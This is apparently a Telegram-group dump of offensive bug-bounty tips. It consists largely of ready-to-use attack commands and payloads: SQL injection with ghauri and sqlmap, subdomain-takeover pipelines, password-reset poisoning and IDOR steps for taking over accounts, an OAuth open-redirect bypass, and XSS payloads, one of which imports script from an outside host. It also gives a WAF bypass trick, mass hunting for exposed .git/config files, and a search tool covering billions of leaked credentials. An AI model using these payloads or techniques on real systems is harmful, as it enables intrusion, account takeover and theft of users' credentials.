Termux All Command [Telegram Group]

SQLi on Post parameter 'Username' Using Ghauri ghauri -r Request[•]txt -p Username --batch Tip: Firstly I confirm the SQLi Error with this Payload : " or 1=1 -- -// Then I'll give it to sqlmap and it said its not vulnerable after that I'll give a try to ghauri and Boom 💥 Got the SQL Injection Visit Youtube for PoC: https://lnkd.in/dV3YNPbJ

Subdomain-takeover subfinder -d example[.]com -all -recursive -silent -o subdomains.txt cat subdomains.txt | httpx -mc 404 -rl 5 -o 404_list.txt subzy run --targets 404_list.txt --hide_fails | tee subzy.txt nuclei -l 404_list.txt -t ~/nuclei-templates/subdomain-takeover -v -o nuclei_takeovers.txt — a list of services and how to claim (sub)domains with dangling DNS records. # https://lnkd.in/gV3ykaRs # https://lnkd.in/g3C9-GVG Summary of Workflow Subdomain Discovery: subfinder Status Filtering: httpx (for 404 responses) Takeover Detection: subzy and nuclei

Bug : Full Account Takeover through Password Reset Poisoning Original request --> GET /engine?service=session&cmd=sendresetpasswordmail HTTP/1.1 Host: host.nl Modified request --> Change the host name to the attacker site. GET /engine?service=session&cmd=sendresetpasswordmail HTTP/1.1 Host: bing.com * Send this request. * Check the email, as the victim clicks on that link it will redirect to the attacker's website. And You can obtain the victim's token to reset

Leaked passwords database search tool Search by 3,2 billions leaked credentials by: - email - nickname - password https://www.proxynova.com/tools/comb/

🔖Bypassing Open Redirect in OAuth ❌Failed Attempt: https://example.com@hacker.com ✅Successful Attempt: https://hacker.com\@example.com

All Cheat Sheet About Net user

Happy hunting! 🤑 Mass hunting exposed git with hednsextractor: 1️⃣Tools: hednsextractor + httpx + Dotgit Plugin 2️⃣hednsextractor -target "your target" -silent | httpx -path /.git/config -status-code -ms 200 -silent

One of my best Encoded XSS payloads : "%3E%3CD3V%0DonMOUseovEr%09=%09["BadrHere"].find(confirm)%0Dx%3Ev3dm0s" Happy Hunting ! :D

Lots off free tools : https://www.majorgeeks.com/mg/sortdate/networking.html

🚀 Discover How Bug Hunters Found Their First Bugs! 😎 🔍 Google Dork 👇 site:medium.com ("how I found my first bug" OR "how I got my first bounty" OR "how I discovered my first")

CTF Archieve : https://github.com/sajjadium/ctf-archives

CTF writeups : https://github.com/LazyTitan33/CTF-Writeups

Bug bounty tip IDOR via Reset password 1- ask for reset password link 2- click on the link and add new password 3- intercept the request with burpsuite 4- found parameter called email 5- replaced my email to victim email 6- found the password of the victim changed

how to install FTP in Windows : https://www.youtube.com/watch?v=agUPsTod-Ns

🚨 hashtag#XSS Payload to Use EVERYWHERE! 🚨 JavaScript​://%250A/*?'/*\'/*"/*\"/*/*\/*%26apos;)/* <!--</Title/<​/Style/<​/Script/</textArea/</iFrame> \74k<K/contentEditable/autoFocus/OnFocus​= /*${/*/;{/**/(import(/https:\\x55.is/.source))}//\76-->

𝗧𝗲𝗿𝗺𝘀𝗵𝗮𝗿𝗸 - A terminal UI for tshark, inspired by hashtag#Wireshark 👨🏽‍💻 Access Wireshark's functionality directly from your terminal. Handy tool for Red Teamers and Security professionals. » https://termshark.io

XSS advanced Tip 1- tried to inject xss via input 2- found 403 3- added header Content-Encoding : WAFBYPASS 4- found that it was 200 bypassed

API #dorks site:example.com inurl:api | site:*/rest | site:*/v1 | site:*/v2 | site:*/v3 inurl:apidocs | inurl:api-docs | inurl:swagger | inurl:api-explorer site:"example.com"

Some File Format Analysis Tools 🖼 ExifTool - https://exiftool.org/ 🔍 Hachoir - https://lnkd.in/dTKbD4J8 📜 Kaitai Struct - https://kaitai.io/ 📄 peepdf - https://lnkd.in/dSDJr5kC ⚙️ Veles - https://codisec.com/veles/ 🔒 PEiD - https://lnkd.in/djfvxKrw 📦 binwalk - https://lnkd.in/gGCsv4g 📊 PDF Stream Dumper - https://lnkd.in/dwc39-x5

Easy to find Sql Injection ✨🍀 Poc : We will use the below one-liner bash command 01 echo "http:///" | gau | uro | grep "\?" | sed "s/=.*/=A\'/" | uniq > params.txt; cat params.txt | httpx -mr ".*SQL.*|.*syntax.*|.*error.*" Exploit the vulnerable endpoints we will going to use the sqlmap 02 : sqlmap -u "http:///sqli?param=A" -p param --dbms=MSSQL --level 1 --risk 1 --banner